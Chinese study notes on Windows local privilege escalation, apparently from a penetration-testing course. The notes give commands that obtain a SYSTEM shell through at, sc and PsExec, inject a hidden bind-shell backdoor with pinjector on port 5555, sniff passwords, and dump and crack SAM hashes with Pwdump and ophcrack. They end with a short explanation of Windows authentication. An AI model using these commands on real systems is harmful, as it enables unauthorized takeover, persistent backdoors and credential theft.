本地提权
windows默认账号
user
Administrator
System
#最高权限
关系图示:
Linux默认账号
User
Root
ADMIN提权为SYSTEM
思路:利用windows中以system运行的程序进行操作,将系统提权
win xp、win2003
- at 18:12(时间) /interactive cmd #以system身份启动cmd
- 启动taskmgr服务
- 杀掉explorer.exe进程(桌面)
- 新建explorer.exe进程
win7,win8
- sc Create syscmd binPath- “cmd /K start” type- own type- interact #创建syscmd系统服务
- sc start syscmd #启动服务
使用工具
Sysinternals Suite中的PsExec程序
PsExec.exe -i -s cmd
注入进程提权
工具 - pinjector.exe
(相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现)
pinjector.exe -p 656(pid) cmd 5555(端口)
#将pinjector.exe注入到656这个进程下,当外部连接5555端口时,系统会将cmd提交出去
抓包嗅探工具
Windows
- Wireshark
- Omnipeek
- commview
- Sniffpass(只抓密码相关的数据包)
Linux
- Tcpdump
- Wireshark
- Dsniff(只抓密码相关的数据包)
本地缓存密码
浏览器缓存的密码
• IE浏览器
• Firefox
网络密码
win7,win8
控制面板->用户账户和家庭安全->凭据管理器
无线密码
Dump SAM
• Pwdump
(不稳定)
• /usr/share/windows-binaries/fgdump/
输入Pwdump.exe localhost生成文件,使用ophcrack点击crack
注意:
windows密码以:分为两段加密lmhash:ntmhash
windows其实不知道你输入的密码,只会保存密文格式,计算哈希值检查输入是否正确
windows身份认证
LSA本地安全助手
传输过程都是密文,身份验证使用NTML协议
不同环境有不同安全包进行身份验